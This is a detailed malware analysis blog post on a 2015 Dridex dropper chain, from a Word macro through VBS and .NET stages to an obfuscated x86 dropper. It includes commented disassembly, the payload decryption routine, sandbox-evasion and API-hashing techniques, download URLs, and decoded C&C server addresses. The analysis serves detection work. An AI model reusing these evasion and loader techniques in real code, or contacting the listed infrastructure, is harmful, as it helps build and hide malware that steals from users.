Tweet Follow @sdkddk

There is a french version here. For other language, you can translate thos page with Google Traductor :

June 18, 2015, 01:30. Last modified on june 24, 2015 01:29 (modifications log)

In-depth analysis of a Dridex malware dropper

A major spam campaign started 2015 June 8 in France for distributing a malware known as Dridex. You will find below a detailed analysis of the functioning of one of his droppers.

Note: several different droppers are currently used in successive spam campaigns to distribute Dridex. The analyzed dropper was received on 08/06/2015.

Contents

• Overview of the operation of Dridex dropper studied
• Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper
• Step 2 - VBS Script downloaded: download of Dridex dropper
• Step 3 - intermediate .net Executable : decryption of a second .net assembly
• Step 4 - second .net Assembly: decrypting an x86 dropper
• Step 5 - x86 dropper : deciphering and launching the payload (botnet 120)
• Digression on obfuscation methods used
• "linear" or "stream-oriented" disassembler
• Unnecessary instructions
• Sandbox detection and elegant management of callback function
• Total obfuscation of Windows API calls
• Modifying data via the stack
• Back to the subject of the dropper
• So what ? Download final Dridex payload DLL !
• Appendices
  • Modifications
  • Downloadable files
  • Tools used
  • Links
  • Payload (botnet 120) deciphered strings

Overview of the dropper operations

The user workstation compromise kinematics is as follows :

1. User receives an email inviting him to open the attachment presented as an unpaid bill ;
2. User opens the document attached to the email, which triggers the execution of a VBA macro embedded in the Word document ;
3. The VBA macro downloads a file hosted on pastebin and containing VBS code, then triggers the execution of this code ;
4. The VBS code downloads an .net executable from 212.76.130.99 server, then launches this executable ;
5. The executable contains C# code and an abnormally large resource. The C# code recombines the content of a number of data tables to reconstruct a second .net assembly, and then loads and executes this assembly ;
6. The code of the second assembly allocates a memory area, copies a data table about 3Kb and executes this datas, which correspond to x86 machine code ;
7. The dropper launched, largely obfuscated (no string in clear, no imports or API calls visible) checks for the charge stored in a resource of the downloaded executable (see 4), decrypts and decompresses the content before executing it ;
8. The payload (which will proove to be the "botnet 120") only has to ensure its sustainability in the system and to conduct his malicious activities ;
9. The botnet 120 will contact his C&C and download the final Dridex payload DLL !

Please, note that steps 3 and 4 are specific to Dridex botnet 120 (thanks to Techhelplist). Some others Dridex droppers skips these steps.

The rest of this page aims to detail these steps by explaining the obfuscation methods used, including the dropper x86. Still with the aim of improving detection capabilities and block the infection process.

Step 1 - Word Document received via spam campaign : download of an intermediate Dridex dropper

As often, the first step in the infection lies in opening a document attached to an email. In our case it is a Word document expected to present a bill to the user and actually containing a piece of VBA code whose purpose is to download the intermediate dropper.

In the case studied here, the downloaded Word document has the following characteristics :

Characteristics of Word document received by email
Origin	Received by mail
Name	2209_0C8D8115C2D2.doc
Size	22 834 bytes
Date	06/08/2015 11:43:00
MD5	666B2121CFB7871CD1354B08D51A36E4
SHA256	62E3CF46F3C805E99913C718A1A32076F9EECC9206CAC45B080F2268064632E0
VirusTotal
malwr

The VBA code is executed when opening the Word document. It is complicated by the addition of many unnecessary waiting routines as well as some classic techniques of VB code obfuscation (cutting and inversing strings for example). The original macro code is available here.

Once "de-obfuscated", the code is as follows :

The macro therefore downloads a VBS file from the Pastebin service, and then executes the VBS file.

Step 2 - VBS Script downloaded: download of Dridex dropper

The downloaded VBS file code is fairly succinct. Its characteristics are the following :

Characteristics of the VBS file downloaded
Origin	Downloaded from http://pastebin.com/download.php?i=1YzPHtum
Name	hGYdsf.vbs
Size	3 491 bytes
Date	06/08/2015 12:20:56
MD5	70EE4226E623FBCE3E82D56E1A531F08
SHA256	AA5E877FC346FA948794CAF90672D00F99109D64CD9050B95E1ECD72776B9312
VirusTotal (26/57 on the 06/14/2015)
malwr

The code is obfuscated by conventional string replacements and concatenation of chr (xxx) with no particular interest.

Once de-obfuscated, the code is as follows :

The intermediate dropper :

• downloads an executable from an HTTP server and stores it in the temporary directory on the host machine as "tryewdgh.exe" ;
• launch the executable ;
• downloads an image on the savepic.ru service, probably to send a signal that a new machine is being compromised ;
• waits for the executable being launched ;
• downloads another picture on the savepic.ru service, probably to send a signal that the compromise is well underway.

The interesting point here lies in the two savepic.ru calls that allow the developer of the spam campaign to track the progress of the compromising process.

Step 3 - intermediate .net Executable : decryption of a second .net assembly

The .net downloaded executable has the following characteristics :

Characteristics of the .net downloaded executable
Origin	Downloaded from http://212.76.130.99/bt/bt/get5.php
Name	tryewdgh.exe
Size	235 240 bytes
Date	06/08/2015 12:21:00
MD5	AB619931EBF56EE0137548F18209F38B
SHA256	C1E879EA756603D66A27C74D8297B78582D808DE48D4E02608F3E57193542122
VirusTotal (37/57 on the 06/14/2015)
malwr also known as "crypted.120.exe".

The executable contains several resources and types :

The size of a one of the resources is surprisingly large :

Regarding the code, only the KampongFlabby class is interesting. It contains more than 300 methods, the vast majority are of of no interest except for being capable to fool antivirus            by generating various executables on the fly.

Most methods return a value or modify a received parameter. They also often contain valid code but included in if() statements which are always false. Example :

The only interesting and used methods are ExploitsForearms(), HatchetsDramatists(), IslamFrugality(), �L~() (entry point) and MarshalledLiverworks().

Note : GlitteringGlistened() method contains no code. it probably just serves to muddy the waters because some decompilers fail to decompile it.

The entry point simply calls KampongFlabby.ExploitsForearms(); method, which contains almost all of the intermediate dropper code. The obfuscated code is available here. Once cleaned, the code is as follows :

As can be seen from reading the source, ExploitsForearms() method :

• creates several data arrays, some of them very large, containing a messy .net assembly ;
• combines all of these data in a single array ;
• calls the HatchetsDramatists() method passing in as parameters the array, array size, permutation key and an unused parameter. Method HatchetsDramatists() will take care to reorder the bytes ;
• loads the assembly and launchs it.

Cleaned HatchetsDramatists() method is the following :

This method is interresting because of the modification algorithm of the key at each permutation.

The new .NET assembly being launched, we can take the next step...

Step 4 - second .net Assembly: decrypting an x86 dropper

The intermediate assembly (available here) is of no particular interest. It contains a data block of about 3Kb that it will load into memory and run. The data in question contains a piece of x86 code. The intermediate assembly can be summed up with the following code :

So, we can go directly to the next step...

Step 5 - x86 dropper : deciphering and launching the payload

Code is available here : Dridex x86 dropper disassembled, and binary there : Dridex x86 dropper (binary).

See here for disassembled and commented code is also available.

In this part we will see what the dropper does and detail its anti-disassembly and sandbox detection methods.

Digression on obfuscation methods used

This code is interesting for several reasons. It exhibits a number of techniques to make it fairly resistant to static analysis :

• Consumption of call return address as API callback enumeration ;
• Immoderate use of jmp to mislead disassemblers operating in "linear" mode ;
• Total obfuscation of imports used ;
• Changing variables by stacking them and modifying them directly on the stack ;
• Disseminating useless instructions to complicate the reading and understanding of the code ;

"linear" or "stream-oriented" disassembler

As a preliminary, an illustration of the use of JMP to mislead disassemblers operating in linear mode. Consider the following code disassembled by IDA, wich works in "flux" mode :

seg000:000002FE C7 45 F8 00 00 00+                mov     [ebp+var_8], 0
seg000:00000305 46                                inc     esi
seg000:00000306 8D 45 F8                          lea     eax, [ebp+var_8]
seg000:00000309 11 DE                             adc     esi, ebx
seg000:0000030B EB 03                             jmp     short loc_310
seg000:0000030D BC                                db 0BCh ; +
seg000:0000030E EA                                db 0EAh ; Û
seg000:0000030F AB                                db 0ABh ; ½
seg000:00000310                       loc_310:                                
seg000:00000310 50                                push    eax 
seg000:00000311 47                                inc     edi
seg000:00000312 E8 1F 00 00 00                    call    sub_336

We can ask what are the 3 bytes 0x30D - 0x30F ? They serve to make the code less readable by disassemblers that work            in linear mode. For example, Ollydbg decodes the same sequence as follows :

seg000:000002FE C7 45 F8 00 00 00+                mov     [ebp+var_8], 0
seg000:00000305 46                                inc     esi
seg000:00000306 8D 45 F8                          lea     eax, [ebp+var_8]
seg000:00000309 11 DE                             adc     esi, ebx
seg000:0000030B EB 03                             jmp     short 000000310
seg000:0000030D BC EA AB 50 47                    mov     esp, 4750ABEA
seg000:00000312 E8 1F 00 00 00                    call    sub_336

We can note that in the case of disassembly in linear mode, you see a JMP to a destination in the middle of an MOV instruction ! In linear mode,             disassembler disassembles the instructions one after the other, so after the interpretation of two bytes of the JMP, it interprets following bytes as a             MOV ESP, 4750ABEA, wrongly !

A disassembler operating in stream mode stores the destination of the JMP and resumes disassembly there. Thus it correctly decodes the sequence PUSH EAX / INC EDI in             0x310 and interprets the bytes in 0x30D - 0x30F as data since they have no sense as instructions.

The remaining difficulty as a reader of the code is to decide whether these data are meaningful or not... In this case it is not.

In the rest of this article, the JMP and skipped unnecessary data will be removed from the code to improve readability.

Unnecessary instructions

Before returning to what the dropper does, second digression on unnecessary instructions to complicate the understanding of the code. If one studies the following code :

seg000:00000276                   nextDword:      
seg000:00000276 31 C1                             xor     ecx, eax
seg000:00000278 83 FB 00                          cmp     ebx, 0
seg000:0000027B 74 6A                             jz      short loc_2E7          ; ======> No more bytes to decipher...
seg000:0000027D 0F AF FF                          imul    edi, edi
seg000:00000280 8B 06                             mov     eax, [esi]             ; On prend 4 octets de la source...
seg000:00000282 49                                dec     ecx
seg000:00000283 33 45 10                          xor     eax, [ebp+key]         ; ...on les déchiffre...
seg000:00000286 0F AF FE                          imul    edi, esi
seg000:00000289 89 06                             mov     [esi], eax             ; ...et on les remet dans le buffer !
seg000:0000028B 09 4D DC                          or      [ebp+var_24], ecx
seg000:0000028E FF 75 10                          push    [ebp+key]              ; Pushs the key on the stack
seg000:00000291 89 F2                             mov     edx, esi
seg000:00000293 C1 04 24 04                       rol     [esp+30h+var_30], 4    ; Rolling the key 4 bits left
seg000:00000297 C7 45 E0 FD 00 00+                mov     [ebp+var_20], 0FDh     
seg000:0000029E C1 04 24 02                       rol     [esp+30h+var_30], 2    ; ...and 2 more bits...
seg000:000002A2 6B FF 0B                          imul    edi, 0Bh
seg000:000002A8 D1 04 24                          rol     [esp+30h+var_30], 1          ; ...and one more bit !
seg000:000002AB F7 DF                             neg     edi
seg000:000002AD 8D 4D 0C                          lea     ecx, [ebp+bufferSize]
seg000:000002B0 8B 09                             mov     ecx, [ecx]                   ; ECX = buffer size
seg000:000002B2 29 0C 24                          sub     [esp+30h+var_30], ecx        ; Key = key-bufferSize
seg000:000002B5 83 DA 17                          sbb     edx, 17h
seg000:000002B8 81 2C 24 8A 3F 61+                sub     [esp+30h+var_30], 49613F8Ah  ; Key = Key-0x49673F8A
seg000:000002BF 4A                                dec     edx
seg000:000002C4 81 2C 24 48 C3 34+                sub     [esp+30h+var_30], 34C348h    ; Key=Key-0x34C348
seg000:000002CB 1B 7D F8                          sbb     edi, [ebp+var_8]
seg000:000002D2 8F 45 10                          pop     [ebp+key]                    ; Pops the key modified directly on the stack
seg000:000002D5 29 D8                             sub     eax, ebx
seg000:000002D7 4B                                dec     ebx
seg000:000002D8 8B 45 DC                          mov     eax, [ebp+var_24]
seg000:000002DF 46                                inc     esi
seg000:000002E0 F7 DA                             neg     edx
seg000:000002E5 EB 8F                             jmp     short nextDword
seg000:000002E7                   loc_2E7:        
seg000:000002E7 89 75 F0                          mov     [ebp+var_10], esi
seg000:000002EF 5E                                pop     esi
seg000:000002F0 5B                                pop     ebx
seg000:000002F1 C9                                leave
seg000:000002F2 C2 0C 00                          retn    0Ch

We can note that the registers EDI and EDX are used repeatedly to change their content, but never to use it. These registers are not used             by the caller. One can also see at 0x2D5 that the SUB EAX, EBX instruction is unnecessary since it is followed by MOV EAX, [EBP + var_24] which will overwrite its content !

The dropper code is riddled with unnecessary instructions greatly complicating his reading and understanding.

Sandbox detection and elegant management of callback function

The first action of the dropper is to count the number of windows in the system by using the EnumWindows ( WNDENUMPROC lpEnumFunc, LPARAM lParam ) function, probably            to detect execution within some sandbox. The EnumWindows () function has two parameters : a pointer to a callback function and a DWORD pointer to propagate to this function. The callback function will be called by EnumWindows () for each window of the system.

The sandbox detection function uses a fun trick: it prepares the lparam to pass to EnumWindows (this will be a pointer to a window counter),             then makes a CALL (see blue) to a piece of code that will call EnumWindows (). Since no other parameter than lParam was             stacked, the return address CALL will be recovered in the stack with the EnumWindows () which will interpret it as the address of the callback function !

In this way, the code for the callback function (see Green) is found in the middle of the sandbox detection function and IDA is totally lost as it          can not detect that the code from the address 0x317 is a callback and seeing a CALL it creates an sub_336, wrongly ending the detectSandbox sub and losing in the interpretation of the stack.

seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5                   ; *                      detectSandbox (to be confirmed) ?                              *
seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5                   ; * DESCRIPTION : this function counts the Windows in the system and returns 1 if the   *
seg000:000002F5                   ; *               number of windows is 15, 1C, 7 or 6, else it returns 0.               *
seg000:000002F5                   ; *                                                                                     *
seg000:000002F5                   ; ***************************************************************************************
seg000:000002F5
seg000:000002F5                   detectSandbox   proc near
seg000:000002F5                   var_8           = dword ptr -8
seg000:000002F5                   var_4           = dword ptr -4
seg000:000002F5                   arg_0           = dword ptr  8
seg000:000002F5                   arg_4           = dword ptr  0Ch
seg000:000002F5 55                                push    ebp
seg000:000002F6 89 E5                             mov     ebp, esp
seg000:000002F8 83 EC 34                          sub     esp, 34h
seg000:000002FE C7 45 F8 00 00 00+                mov     [ebp+var_8], 0
seg000:00000306 8D 45 F8                          lea     eax, [ebp+var_8] ; [ebp+var_8] is the counter of windows
seg000:00000310 50                                push    eax             ; EAX refers [ebp+var_8] => lpParam for future call to EnumWindows();
seg000:00000312 E8 1F 00 00 00                    call    sub_336
seg000:00000317                   ; We will never return here since we have stacked only one parameter and called a portion
seg000:00000317                   ; of code who will call EnumWindows() which consumes two parameters. The return address stacked by the call will be
seg000:00000317                   ; used as the EnumWindows callback function.
seg000:00000317                   ; =======================================================================================
seg000:00000317
seg000:00000317
seg000:00000317                   ; ---------------------------------------------------------------------------------------
seg000:00000317                   ; Entry point of the EnumWindows callback function called by sub_336
seg000:00000317                   ;
seg000:00000317                   ; BOOL CALLBACK EnumWindowsProc ( _In_ HWND hwnd, _In_ LPARAM lParam );
seg000:00000317                   ;
seg000:00000317                   ; This callback function is used to count the number of windows in the system.
seg000:00000317 19 CA                             sbb     edx, ecx         ; dumb instruction not removed to have something in 0x317
seg000:00000319 8B 44 24 08                       mov     eax, [esp+arg_0] ; EAX = lParam = pointer to windows counter
seg000:00000324 FF 00                             inc     dword ptr [eax]  ; Increment windows counter
seg000:0000032B B8 01 00 00 00                    mov     eax, 1           ; Return 1 to continue enumeration
seg000:00000331 C2 08 00                          retn    8
seg000:00000336                   ; ---------------------------------------------------------------------------------------
seg000:00000336
seg000:00000336
seg000:00000336                   ; =======================================================================================
seg000:00000336                   ; This is not really a subroutine. IDA had been fooled by the EnumWindows
seg000:00000336                   ; callback function hidden into sub_2F5
seg000:00000336                   sub_336         proc near
seg000:00000336 68 21 5E 53 7C                    push    7C535E21h       ; 'User32.dll'
seg000:0000033B E8 D9 FC FF FF                    call    getModuleHandle
seg000:00000340 68 CA 16 5D 38                    push    385D16CAh       ; EnumWindows hash
seg000:00000345 50                                push    eax
seg000:00000346 E8 BD FD FF FF                    call    getAPIAddress
seg000:0000034B FF D0                             call    eax             ; Call to EnumWindows ( WNDENUMPROC lpEnumFunc, LPARAM lParam );
seg000:0000034D                   ; Here we return from EnumWindows() and [EBP-8] contains the number of windows enumerated
seg000:0000034D                   ; It seems that some sandboxes have only a few windows to enumerate because
seg000:0000034D                   ; if there is only 0x15, 0x1C, 7 or 6 windows, we will terminate here !seg000:0000034D
seg000:0000034F 83 7D F8 15                       cmp     dword ptr [ebp-8], 15h ; [EBP-8] is the windows counter (Value = 0x5A in my XP VM)
seg000:00000353 74 2A                             jz      short loc_37F
seg000:0000035B 83 7D F8 1C                       cmp     dword ptr [ebp-8], 1Ch
seg000:0000035F 74 1E                             jz      short loc_37F
seg000:00000363 83 7D F8 07                       cmp     dword ptr [ebp-8], 7
seg000:00000367 74 16                             jz      short loc_37F
seg000:0000036F 83 7D F8 06                       cmp     dword ptr [ebp-8], 6
seg000:00000373 74 0A                             jz      short loc_37F
seg000:0000037A EB 0E                             jmp     short loc_38A
seg000:0000037F                   loc_37F:                                ; ...
seg000:00000381 B8 01 00 00 00                    mov     eax, 1          ; Return 1 ==> process will be terminated !
seg000:00000388 C9                                leave
seg000:00000389 C3                                retn                    ; ===> We will come back in 0x3B1, return of caller of detectSandbox !
seg000:0000038A                   loc_38A:                                ; ...
seg000:0000038D 31 C0                             xor     eax, eax        ; Return 0 => we will live...
seg000:00000391 C9                                leave
seg000:00000392 C3                                retn                    ; ===> We will come back in 0x3B1, return of caller of detectSandbox !
seg000:00000392                   sub_336         endp

Total obfuscation of Windows API calls

You might have noticed from 0x336 to 0x346 the unusual mode Windows API invocation ?

Here's another example to retrieve the handle of the current application :

seg000:000003C6	                                      ; Stacking API parameters
seg000:000003C6 6A 00                                 push    0               ; Retrieve current app handle
seg000:000003CF                                       ; Retrieving DLL handle
seg000:000003CF 68 45 98 BB F3                        push    0F3BB9845h      ; 'Kernel32.dll' hash
seg000:000003D4 E8 40 FC FF FF                        call    getModuleHandle ; Rtrieve Kernel32.dll handle in EAX
seg000:000003D9                                       ; Retrieving API function address
seg000:000003D9 68 FD 49 87 C6                        push    0C68749FDh      ; 'GetModuleHandleW' hash
seg000:000003DE 50                                    push    eax             ; Pushs Kernel32.dll handle for getAddress call
seg000:000003DF E8 24 FD FF FF                        call    getAPIAddress   ; Retrieve GetModuleHandle() entry point in EAX
seg000:000003E4                                       ; Calling API function
seg000:000003E4 FF D0                                 call    eax             ;  GetModuleHandle( NULL );

The dropper uses a total obfuscation method consisting in :

• a module handle search function based on a hash of its name
• a search function for finding exported function address operating on the basis of a hash of the function name

Each time the dropper needs to call a Windows API, it stacks the parameters to send to the API (here PUSH 0 to retrieve the handle of the current application), then            it pushes the hash name of the DLL containing the desired API and calls the DLL handle recovery function. Then he pushes the hash of the name of the desired function, and            the handle of the DLL and calls the API address search function. Finally he calls the desired Windows API.

The API search function in the DLL (function here named getAPIAddress) is classic : it parse the table of exports of the DLL module               in memory, hashing each function name it exports and comparing it to the desired hash.

The search DLL handle function uses the PEB and the PEB_LDR_DATA to walk throught the process's list of loaded module and retrieve the one looked for by comparing hash of the DLL name.

Modifying data via the stack

Final point of interest in code reading complication : in the decryption function of the compressed executable hidden in a sequence of resources, the dropper uses            a sequence of instructions like PUSH DWORD PTR SS: [EBP + 10h] then changes of the DWORD at the top of the stack, such as ROL [ESP], 4 then DWORD PTR SS POP: [EBP + 10h]. An inattentive reader will not see that the value pushed on the stack has been modified before being recovered since generally within the same block of code, instructions            PUSH and POP are used precisely to preserve the pushed value !

You can see an illustration of this technique a little further down in this page in the decryption routine named bufferDecipher (see here), at offsets 0x28E, 0x293, 0x29E, 0x2A8, 0x2B2, 0x2B8, 0x2C4 and 0x2DD.

Back to the subject of the dropper

After this digression, back to the subject of the dropper operations. Its main function will be to decrypt and decompress a new executable hidden in a resource of the             .net executable launched. Once decrypted and decompressed, it will run it.

The recovery method of encrypted data is rather special :

1. the dropper first retrieves the file name running and then opens the file, reads its size, allocates a memory area and reloads the file in this area (see code from 0x3CF to 0x580);
2. then it reconstitutes a 20-byte buffer in memory with the following routine :
   

   seg000:00000581 B8 56 CD D3 A0                    mov     eax, 0A0D3CD56h
   seg000:0000058A B9 05 00 00 00                    mov     ecx, 5
   seg000:00000596 8D 7D C4                          lea     edi, [ebp-3Ch]  ; EDI pointe sur EBP-3C
   seg000:000005A0 4A                                dec     edx
   seg000:000005A1 89 C2                             mov     edx, eax        ; EDX=0xA0D3CD56
   seg000:000005A6 C1 C2 07                          rol     edx, 7          ; ROL EDX,7
   seg000:000005AB 01 D0                             add     eax, edx        ; ADD EDX,EAX
   seg000:000005AD F7 DE                             neg     esi
   seg000:000005AF AB                                stosd                   ; EAX -> [ES:EDI]
   seg000:000005B3 49                                dec     ecx
   seg000:000005B4 75 EA                             jnz     short loc_5A0

   The content of the buffer located in [EBP-3Ch] after its constitution will be as follows :
   

   A6 78 BA 0A AB CB F6 67 5E A1 5C 63 8F 50 AD 11 17 98 55 E8

3. and its structure will prove to be the following :
   

   struct dridexDropperSignature {      // Value
     unsigned int signature;                 // 0x0ABA78A6
     unsigned int signature2;                // 0x67F6CBAB
     unsigned int compressedModuleSizeKey;   // 0x635CA15E used to decipher compressed module size
     unsigned int uncompressedModuleSizeKey; // 0x11AD508F used to decipher uncompressed module size
     unsigned int decipheringKey;            // 0xE8559817 used to decipher the buffer deciphering key
   };

4. the dropper will scan the executable reloaded into memory from the end, searching for the 4-byte pattern signatures. Once found, it will control the following 4 bytes            are identical to signature2. It will thus have found the beginning of the data block of interest.
5. the dropper will then use the DWORD compressedModuleSizeKey to decipher with a simple XOR the following 4 bytes containing the size of compressed data. He will thus            know how much data to decipher, then unzip.
6. it will then do the same with the DWORD uncompressedModuleSizeKey to decipher with the same simple XOR the following 4 bytes containing the size of the uncompressed data ;
7. Finally, it will apply the same procedure to recover the decryption key contained in the following 4 bytes.
8. Armed with these necessary informations, the dropper will be able to decrypt the data using the following function (blue code deciphering the data and red one permuting key) :
   

   seg000:0000024E                   bufferDecipher  proc near         
   seg000:0000024E                   var_30          = dword ptr -30h
   seg000:0000024E                   var_24          = dword ptr -24h
   seg000:0000024E                   var_20          = dword ptr -20h
   seg000:0000024E                   var_1C          = dword ptr -1Ch
   seg000:0000024E                   var_10          = dword ptr -10h
   seg000:0000024E                   var_8           = dword ptr -8
   seg000:0000024E                   lpBuffer        = dword ptr  8
   seg000:0000024E                   bufferSize      = byte ptr  0Ch
   seg000:0000024E                   key             = dword ptr  10h
   seg000:0000024E 55                                push    ebp             ; lgBuffer = 0xB070
   seg000:0000024E                                                           ; key = 0xA0D3CD56
   seg000:0000024F 89 E5                             mov     ebp, esp
   seg000:00000251 83 EC 24                          sub     esp, 24h
   seg000:00000254 53                                push    ebx
   seg000:00000255 56                                push    esi
   seg000:00000259 8D 45 0C                          lea     eax, [ebp+bufferSize]
   seg000:0000025C FF 30                             push    dword ptr [eax] ; Stacks buffer size...
   seg000:0000025E 87 7D F0                          xchg    edi, [ebp+var_10]
   seg000:00000261 5B                                pop     ebx             ; ...and unstacks into EBX !
   seg000:00000268 83 EB 03                          sub     ebx, 3
   seg000:0000026B 87 CA                             xchg    ecx, edx
   seg000:00000270 8B 75 08                          mov     esi, [ebp+lpBuffer]
   seg000:00000276                   
   seg000:00000276                   nextDword:                             
   seg000:00000276 31 C1                             xor     ecx, eax
   seg000:00000278 83 FB 00                          cmp     ebx, 0
   seg000:0000027B 74 6A                             jz      short loc_2E7   ; ======> No more bytes to decipher...
   seg000:00000280 8B 06                             mov     eax, [esi]      ; On prend 4 octets de la source...
   seg000:00000282 49                                dec     ecx
   seg000:00000283 33 45 10                          xor     eax, [ebp+key]  ; ...on les déchiffre...
   seg000:00000289 89 06                             mov     [esi], eax      ; ...et on les remet dans le buffer !
   seg000:0000028B 09 4D DC                          or      [ebp+var_24], ecx
   seg000:0000028E FF 75 10                          push    [ebp+key]       ; Pushs the key on the stack
   seg000:00000293 C1 04 24 04                       rol     [esp+30h+var_30], 4 ; Rolling the key 4 bits left
   seg000:0000029E C1 04 24 02                       rol     [esp+30h+var_30], 2 ; ...and 2 more bits...
   seg000:000002A8 D1 04 24                          rol     [esp+30h+var_30], 1 ; ...and one more bit !
   seg000:000002AD 8D 4D 0C                          lea     ecx, [ebp+bufferSize]
   seg000:000002B0 8B 09                             mov     ecx, [ecx]      ; ECX = buffer size
   seg000:000002B2 29 0C 24                          sub     [esp+30h+var_30], ecx ; Key = key-bufferSize
   seg000:000002B8 81 2C 24 8A 3F 61+                sub     [esp+30h+var_30], 49613F8Ah ; Key = Key-0x49673F8A
   seg000:000002C4 81 2C 24 48 C3 34+                sub     [esp+30h+var_30], 34C348h ; Key=Key-0x34C348
   seg000:000002D2 8F 45 10                          pop     [ebp+key]       ; Pops the key modified directly on the stack
   seg000:000002D7 4B                                dec     ebx
   seg000:000002D8 8B 45 DC                          mov     eax, [ebp+var_24]
   seg000:000002DF 46                                inc     esi
   seg000:000002E5 EB 8F                             jmp     short nextDword
   seg000:000002E7                   loc_2E7:                                ; ...
   seg000:000002E7 89 75 F0                          mov     [ebp+var_10], esi
   seg000:000002EF 5E                                pop     esi
   seg000:000002F0 5B                                pop     ebx
   seg000:000002F1 C9                                leave
   seg000:000002F2 C2 0C 00                          retn    0Ch
   seg000:000002F2                   bufferDecipher  endp
   

   The decryption algoritghme in C is as follows :
9. Once the data decrypted, it will allocate a memory area the size of decrypted data, and then call RtlDecompressBuffer () to unzip the buffer, and we will find, in the memory area allocated, a new PE executable almost ready to be executed.
   Executable characteristics :
   

   Deciphered and unzipped payload characteristics
   Origin	Deciphered and unzipped by the dropper, from the resource section
   Name	NA
   Size	64 000 bytes
   Date	NA
   MD5	7AC7416FCAB7745F9000EA3E281C8318
   SHA256	BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
   VirusTotal (26/57 on the 06/14/2015)
   malwr

10. ...the dropper just have to create a new process, injecting the contents of the executable in it and run it !

So What ? Download final Dridex payload DLL !

Just after being launched, the payload will prooved to be the Dridex "botnet 120" with this deciphered configuration :

<config botnet="120">
<server_list>
50.63.174.16 :6443
79.143.191.147 :6443
37.143.9.63 :4433
</server_list>
</config>

Botnet 120 will contact his C&C (50.63.174.16) and download the final Dridex payload DLL from 79.143.191.147 :

Final payload downloaded by "botnet 120"
Origin	Downloaded by botnet 120 from 79.143.191.147 on the June 23, 2015
Name	27.tmp
Size	491 520 bytes
Date	NA
MD5	D7113159AC45B5958AD69D33B066529D
SHA256	A1254BF4F9E8D3BA808E1C3F9B840130569892905B7A209B1B7CE1B4610602C4
VirusTotal (14/57 on the 06/23/2015)
malwr

We have to note that in the meantime of this analysis a new dropper has been launched, with similar VBA and VBS code but different intermediate dropper.

To be continued...

Appendices

Modifications

• June 18, 2015 01:30 - first upload
• June 18, 2015 22:15
  
  • forgot to put the x86 dropper commented disassembled listing. Here it is !
  • link to french page corrected. Désolé :-/
• June 19, 2015 01:08 - Payload deciphered strings added in appendices
• June 24, 2015 00:02 - Illustration modified (Step 9 added), payload ("botnet 120") config added and final Payload added.

Downloadable files

• Word document with Dridex dropper pwd="infected" - WARNING : although URL is down, don't execute macros !
• Dridex intermediate 1 dropper - vbs script pwd="infected" - WARNING : although URL is down, don't execute this script !
• Dridex intermediate dropper .net assembly pwd="infected" - WARNING : don't execute this one !!!
• Dropper x86 pwd="infected" - x86 dropper code
• Dropper x86 disasembled and commented
• Dridex "botnet 120" payload pwd="infected" - WARNING : don't execute this one !!!
• Dridex final payload downloaded by "botnet 120" pwd="infected" - WARNING : don't execute this one !!!

Tools used

The tools used are fairly standard.

• IDA Pro The best known and most pleasant to use since Sourcer !
• ILSpy Open-source .NET assembly browser and decompiler.
• VirtualBox In order to dynamically study the x86 dropper
• Oletools Very good OLE files analyzer. Can extract macros from documents.
• OllyDbg To run the dropper in a VM and follow its code, it complements the static analysis with IDA
• PEview and pestudio to easily dump the Payload ressources

Links

• Evolution of Dridex June 18, 2015
• Chasing cybercrime : network insights of Dyre and Dridex Trojan Bankers Blueliv, april 2015
• McAfee Labs Threat Advisory : Dridex June 15, 2015
• ‘Banking’ Malware Dridex Arrives via Phishing EmailMc Afee Labs - Mar 26, 2015
• Dridex Code Breaking – Modify the Malware to Bypass the VM Bypass An older Dridex dropper
• TSPY_DRIDEX.WQJ - Threat Encyclopedia November 19,2014

Payload (botnet 120) deciphered strings

Although I don't have reversed all the botnet 120 yet, I deciphered some ciphered strings blocks. These confirms that it's the Dridex botnet 120 malware :

Config :

Deciphered strings of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F2
Offset. : In memory decipher

<config botnet="120">
<server_list>
50.63.174.16 :6443
79.143.191.147 :6443
37.143.9.63 :4433
</server_list>
</config>

First strings block :

Deciphered strings (1/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x40A058-0x40A27F (PE file offsets : 0x9058-0x927F)

Count	String
0	MBAMService
1	$$$Secure UAP
2	Program Manager
3	Progman
4	edg
5	.tmp
6	.exe
7	updfiles\
8	upd.ver
9	lastupd.ver
10	\Avg20%d\update\
11	download
12	\TEMP\avwin.ini
13	"%savconfig.exe" /SAVEAVWININI="avwin.ini;"
14	Local AppData
15	{A520A1A4-1780-4FF6-BD18-167343C5AF16}
16	AppDataDir
17	AppDataDirectory
18	Path	

Second strings block :

Deciphered strings (2/5) of Dridex Botnet 120 Malware
-----------------------------------------------------
Date... : June 08, 2015
MD5.... : 7AC7416FCAB7745F9000EA3E281C8318
SHA256. : BF5640FA9D6F202046020CB2320FDAD0763ED5FC7477BB2AEC4C204AEEE8759D
Offsets : 0x4A280-0x40DA9F (PE file offsets : 0x9280-0xCA9F)

Count	String
0	SYSTEM/CurrentControlSet/Control/ComputerName/ComputerName
1	SOFTWARE/Microsoft/Windows NT/CurrentVersion
2	<loader><get_module unique="%s" botnet="%d" system="%d" name="bot" bit="%d"/>
3	SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall
4	<soft><![CDATA[
5	]]></soft></loader>
6	<module
7	Software/Microsoft/Windows/CurrentVersion/Explorer/Shell Folders
8	botnet="
9	<server_list>
10	</server_list>
11	rundll32.exe "%S" NotifierInit
12	$&=-+?,~ +=&_.$~@abcsefghijklmnopqrstuvwxyz0123456789ABCSEFGHIJKLMNOPQRSTUVWXYZ
13	<cfg net="%d" build="0"><startup>%s</startup><del>%S</del></cfg>
14	Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID/%s/ShellFolder
15	ComputerName
16	Volatile Environment
17	InstallDate
18	USERNAME
19	<nodes>
20	</nodes>
21	ALLUSERSPROFILE
22	\Malwarebytes\Malwarebytes Anti-Malware\
23	exclusions.dat
24	Configuration\settings.conf
25	Configuration\scheduler.conf
